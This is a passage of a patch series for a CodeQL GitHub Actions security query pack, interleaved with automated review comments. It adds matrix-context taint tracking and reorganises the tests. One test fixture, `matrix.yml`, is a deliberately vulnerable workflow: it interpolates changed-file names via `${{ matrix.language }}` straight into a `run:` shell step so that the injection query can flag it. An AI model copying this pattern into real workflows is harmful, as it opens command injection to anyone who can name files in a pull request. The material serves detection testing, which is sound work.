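Review bot: `wrapRegexp` recognises only an expression that is exactly the bare context reference or exactly one `fromJSON(...)`/`toJSON(...)` around it; since QL's `regexpMatch` matches the whole string (which also makes the `\b` anchors effectively redundant), shapes such as `fromJSON(needs.a.outputs.b).key`, `matrix.os.version`, `needs.a.outputs.b || ''` or a call with inner whitespace like `fromJSON( needs.a.outputs.b )` fall through silently, and for an injection query that is a lost source rather than a spurious alert. If this exact-shape matching is deliberate, a short comment above `wrapRegexp` stating that only these three forms are recognised would save a debugging session; otherwise allowing optional whitespace, e.g. `"fromJSON\\(\\s*" + regex + "\\s*\\)"`, is a cheap widening. Any group you add must come after the existing ones so the callers' `regexpCapture(..., 1)`/`(..., 2)` indices stay valid.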
@@ -487,3 +523,31 @@ class EnvCtxAccessExpr extends CtxAccessExpr { ) } } + +/** + * Holds for an expression accesing the `matrix` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ matrix.foo }}` + */ +class MatrixCtxAccessExpr extends CtxAccessExpr { + string fieldName; + + MatrixCtxAccessExpr() { + expr.regexpMatch(matrixCtxRegex()) and + fieldName = expr.regexpCapture(matrixCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override Expression getRefExpr() { + exists(WorkflowStmt w | + w.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + w.getAChildNode*() = this + ) + or + exists(JobStmt j | + j.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + j.getAChildNode*() = this + ) + } +} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 94a2c6a71e2c..b8137172b8c9 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -174,6 +174,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt ( child = this.(ReusableWorkflowStmt).getInputsStmt() or child = this.(ReusableWorkflowStmt).getOutputsStmt() or + child = this.(ReusableWorkflowStmt).getStrategyStmt() or child = this.(ReusableWorkflowStmt).getAJobStmt() ) and l = child.getLocation() @@ -185,7 +186,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt else result = rank[i](Expression child, Location l | - child = super.getAJobStmt() and + ( + child = super.getAJobStmt() or + child = super.getStrategyStmt() + ) and l = child.getLocation() | child 
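Review bot: `MatrixCtxAccessExpr.getRefExpr()` also resolves through `WorkflowStmt.getStrategyStmt()`, but as far as I know `strategy` is only a job-level key in GitHub Actions (the new `matrix.yml` fixture places it under `jobs.analyze` too), so that disjunct, and the `getStrategyStmt()` added to `WorkflowStmt` earlier in this patch, should never bind on a real workflow — and if a file ever did carry a top-level `strategy`, it would attach a definition from outside the enclosing job to every `${{ matrix.x }}` in the file. Unless there is a case I am missing, keeping only the `JobStmt` disjunct matches the intent of `j.getAChildNode*() = this`. The doc comment reads "accesing" and could state the visible limitation that only string-valued matrix entries resolve (`MatrixVariableExpr instanceof YamlString`), so a `${{ matrix.x }}` whose axis is a YAML list or comes from `include:` has no `getRefExpr()` and carries no flow — harmless for literal lists, but it presumably drops taint for the common `include: ${{ fromJSON(needs.<job>.outputs.<x>) }}` pattern.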
@@ -225,6 +229,21 @@ private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { private class OutputExprTree extends LeafTree instanceof OutputExpr { } +private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getMatrixVariableExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } + private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = @@ -232,6 +251,7 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { ( child = super.getAStepStmt() or child = super.getOutputsStmt() or + child = super.getStrategyStmt() or child = super.getUsesExpr() ) and l = child.getLocation() diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 43239e29485d..b9aafb8ec948 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -133,7 +133,7 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { - // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env or inputs + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env, matrix or inputs name = any(StepsCtxAccessExpr a).getFieldName() or name = any(NeedsCtxAccessExpr a).getFieldName() or name = any(JobsCtxAccessExpr a).getFieldName() 
@@ -209,6 +209,18 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } +/** + * Holds if there is a local flow step between a ${{}} expression accesing a matrix variable and the matrix itself + * e.g. ${{ matrix.foo }} + */ +predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, MatrixCtxAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom + ) +} + /** * Holds if there is a local flow step between a ${{}} expression accesing an env var and the var definition itself * e.g. ${{ env.foo }} @@ -234,6 +246,7 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or needsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or + matrixCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } diff --git a/ql/src/test/partial.ql b/ql/src/Debug/partial.ql similarity index 92% rename from ql/src/test/partial.ql rename to ql/src/Debug/partial.ql index 779749f82f66..c0a694455dc9 100644 --- a/ql/src/test/partial.ql +++ b/ql/src/Debug/partial.ql @@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "calling_workflow.yml" + source.getLocation().getFile().getBaseName() = "matrix.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/test/.github/workflows/matrix.yml b/ql/src/test/.github/workflows/matrix.yml new file mode 100644 index 000000000000..30672ecaaa70 --- /dev/null +++ b/ql/src/test/.github/workflows/matrix.yml 
@@ -0,0 +1,42 @@ +name: "CodeQL Auto Language" + +on: + push: + branches: [ main ] + pull_request: + branches: [ main ] + schedule: + - cron: '17 19 * * 6' + +jobs: + create-matrix: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.set-matrix.outputs.all_changed_files }} + steps: + - name: Get changed files + id: set-matrix + uses: tj-actions/changed-files@v40 + + analyze: + needs: create-matrix + if: ${{ needs.create-matrix.outputs.matrix != '[]' }} + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ${{ fromJSON(needs.create-matrix.outputs.matrix) }} + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + + # Initializes the CodeQL tools for scanning. + - run: | + ${{ matrix.language }} diff --git a/ql/src/test/partial.expected b/ql/src/test/partial.expected deleted file mode 100644 index 98aea83de2e5..000000000000 --- a/ql/src/test/partial.expected +++ /dev/null 
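Review bot: The fixture exercises only the `matrix.<key>: ${{ fromJSON(...) }}` shape, so there is no negative case showing that the new matrix step does not over-taint: a second job with a literal axis such as `language: [go, python]` and the same `run: ${{ matrix.language }}` sink should produce no alert and would pin that in `test.expected`. A job that feeds the matrix through `include: ${{ fromJSON(needs.create-matrix.outputs.matrix) }}` and reads `${{ matrix.language }}` is the other common real-world pattern and, given the `YamlString`-only resolution in the accompanying `Ast.qll` change, presumably produces no alert today; recording that (expected or not) in the fixture makes the limitation visible rather than implicit.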
@@ -1,28 +0,0 @@ -edges -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... 
utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | -#select -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... 
.yml@v1 | this source | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... 
.ref }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected index 5dd2313e8518..49ec00e20f70 100644 --- a/ql/src/test/test.expected +++ b/ql/src/test/test.expected 
@@ -27,6 +27,10 @@ edges | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | 
@@ -93,6 +97,11 @@ nodes | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | 
@@ -144,6 +153,7 @@ subpaths | .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential injection from the ${{ matrix.language }}, which may be controlled by an external user. | | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | | .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... 
d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. |
From 5b40d98849f571d683111ef8ab9e721be5cede89 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 28 Feb 2024 14:36:17 +0100
Subject: [PATCH 079/707] Update test db build script
---
 build-test-dbs.sh | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/build-test-dbs.sh b/build-test-dbs.sh
index d8fc4359b927..bb85dc78a376 100755
--- a/build-test-dbs.sh
+++ b/build-test-dbs.sh
@@ -1,4 +1,6 @@
 #!/bin/bash
+rm -rf ql/lib/test/test.testproj || true
+rm -rf ql/src/test/test.testproj || true
 rm -rf src-test.testproj || true
 rm -rf lib-test.testproj || true
 codeql database create src-test.testproj -l yaml -s ql/src/test
From 6b11506abb7c42fe0c7cffcaf06f776fb1787873 Mon Sep 17 00:00:00 2001
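Review bot: The two added `rm -rf` lines, like the two existing ones below them, resolve their relative paths against whatever directory the caller happens to be in, so running the script from anywhere other than the repository root silently removes nothing and the following `codeql database create` calls then point at the wrong source root; anchor the script right after the shebang with `cd "$(dirname "$0")" || exit 1`. The `|| true` suffixes add nothing and hide the one failure that matters: `rm -rf` already exits 0 when the path is absent, the script does not enable `set -e`, and a permission error on a stale `.testproj` is swallowed instead of stopping the build. Since the script deletes directories in bulk and then rebuilds them, `set -eu` at the top would also keep it from continuing past a failed database build.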
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 29 Feb 2024 13:23:59 +0100 Subject: [PATCH 080/707] test: Add tests --- .gitignore | 1 + build-test-dbs.sh | 7 - codeql-workspace.yml | 3 +- ql/lib/codeql/actions/Ast.qll | 7 +- .../codeql/actions/ast/internal/Actions.qll | 2 - ql/lib/qlpack.yml | 1 - ...maries.ql => CompositeActionsSummaries.ql} | 0 ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 6 +- .../{CWE-094 => CWE-829}/UntrustedCheckout.md | 0 .../{CWE-094 => CWE-829}/UntrustedCheckout.ql | 2 +- ql/src/qlpack.yml | 1 - ql/src/test/test.expected | 162 ------------ ql/src/test/test.ql | 37 --- ql/test/codeql-pack.lock.yml | 16 ++ .../library-tests}/.github/workflows/test.yml | 0 .../test => test/library-tests}/test.expected | 0 ql/{lib/test => test/library-tests}/test.ql | 0 ql/test/qlpack.yml | 12 + .../.github/workflows/calling_composite.yml | 1 + .../.github/workflows/calling_workflow.yml | 1 + .../.github/workflows/reusable_workflow.yml | 1 + .../CWE-020/CompositeActionsSinks.expected | 15 ++ .../CWE-020/CompositeActionsSinks.qlref | 1 + .../CWE-020/CompositeActionsSources.expected | 12 + .../CWE-020/CompositeActionsSources.qlref | 2 + .../CompositeActionsSummaries.expected | 12 + .../CWE-020/CompositeActionsSummaries.qlref | 2 + .../CWE-020/ReusableWorkflowsSinks.expected | 8 + .../CWE-020/ReusableWorkflowsSinks.qlref | 2 + .../CWE-020/ReusableWorkflowsSources.expected | 12 + .../CWE-020/ReusableWorkflowsSources.qlref | 2 + .../ReusableWorkflowsSummaries.expected | 16 ++ .../CWE-020/ReusableWorkflowsSummaries.qlref | 2 + .../Security/CWE-020/action1}/action.yml | 1 + .../.github/workflows/argus_case_study.yml | 0 .../.github/workflows/changed-files.yml | 0 .../.github/workflows/comment_issue.yml | 28 +++ .../workflows/comment_issue_newline.yml | 10 + .../CWE-094}/.github/workflows/cross1.yml | 0 .../CWE-094}/.github/workflows/cross2.yml | 0 .../CWE-094}/.github/workflows/cross3.yml | 0 .../CWE-094/.github/workflows/discussion.yml | 8 + 
.../.github/workflows/discussion_comment.yml | 9 + .../CWE-094/.github/workflows/gollum.yml | 11 + .../workflows/image_link_generator.yml | 0 .../CWE-094}/.github/workflows/inter-job.yml | 0 .../CWE-094/.github/workflows/issues.yaml | 20 ++ .../CWE-094}/.github/workflows/matrix.yml | 0 .../CWE-094}/.github/workflows/no-flow1.yml | 0 .../CWE-094}/.github/workflows/no-flow2.yml | 0 .../.github/workflows/pull_request_review.yml | 14 ++ .../workflows/pull_request_review_comment.yml | 14 ++ .../.github/workflows/pull_request_target.yml | 16 ++ .../CWE-094/.github/workflows/push.yml | 16 ++ .../CWE-094}/.github/workflows/simple1.yml | 0 .../CWE-094}/.github/workflows/simple2.yml | 0 .../CWE-094}/.github/workflows/test.yml | 0 .../.github/workflows/workflow_run.yml | 16 ++ .../CriticalExpressionInjection.expected | 227 +++++++++++++++++ .../CWE-094/CriticalExpressionInjection.qlref | 1 + .../CWE-094/ExpressionInjection.expected | 233 ++++++++++++++++++ .../CWE-094/ExpressionInjection.qlref | 1 + .../Security/CWE-094/action1/action.yml | 14 ++ .../Security/CWE-094/action2/action.yml | 17 ++ .../.github/workflows/missing_perms.yml | 10 + .../CWE-275/.github/workflows/perms.yml | 13 + .../MissingActionsPermissions.expected | 1 + .../CWE-275/MissingActionsPermissions.qlref | 2 + .../workflows/actor_trusted_checkout.yml | 0 .../workflows/label_trusted_checkout.yml | 0 .../.github/workflows/unpinned_tags.yml | 11 + .../.github/workflows/untrusted_checkout.yml | 0 .../CWE-829/UnpinnedActionsTag.expected | 7 + .../Security/CWE-829/UnpinnedActionsTag.qlref | 1 + .../CWE-829/UntrustedCheckout.expected | 1 + .../Security/CWE-829/UntrustedCheckout.qlref | 1 + 76 files changed, 833 insertions(+), 216 deletions(-) delete mode 100755 build-test-dbs.sh rename ql/src/Security/CWE-020/{CompositeActionSummaries.ql => CompositeActionsSummaries.ql} (100%) rename ql/src/Security/{CWE-094 => CWE-829}/UntrustedCheckout.md (100%) rename ql/src/Security/{CWE-094 => CWE-829}/UntrustedCheckout.ql 
(98%) delete mode 100644 ql/src/test/test.expected delete mode 100644 ql/src/test/test.ql create mode 100644 ql/test/codeql-pack.lock.yml rename ql/{lib/test => test/library-tests}/.github/workflows/test.yml (100%) rename ql/{lib/test => test/library-tests}/test.expected (100%) rename ql/{lib/test => test/library-tests}/test.ql (100%) create mode 100644 ql/test/qlpack.yml rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/calling_composite.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/calling_workflow.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/reusable_workflow.yml (99%) create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref rename ql/{src/test/composite-actions => test/query-tests/Security/CWE-020/action1}/action.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/argus_case_study.yml (100%) rename ql/{src/test => 
test/query-tests/Security/CWE-094}/.github/workflows/changed-files.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross2.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross3.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/image_link_generator.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/inter-job.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/matrix.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/no-flow1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/no-flow2.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/simple1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/simple2.yml (100%) rename ql/{src/test => 
test/query-tests/Security/CWE-094}/.github/workflows/test.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/action1/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/action2/action.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml create mode 100644 ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected create mode 100644 ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/actor_trusted_checkout.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/label_trusted_checkout.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml rename ql/{src/test => 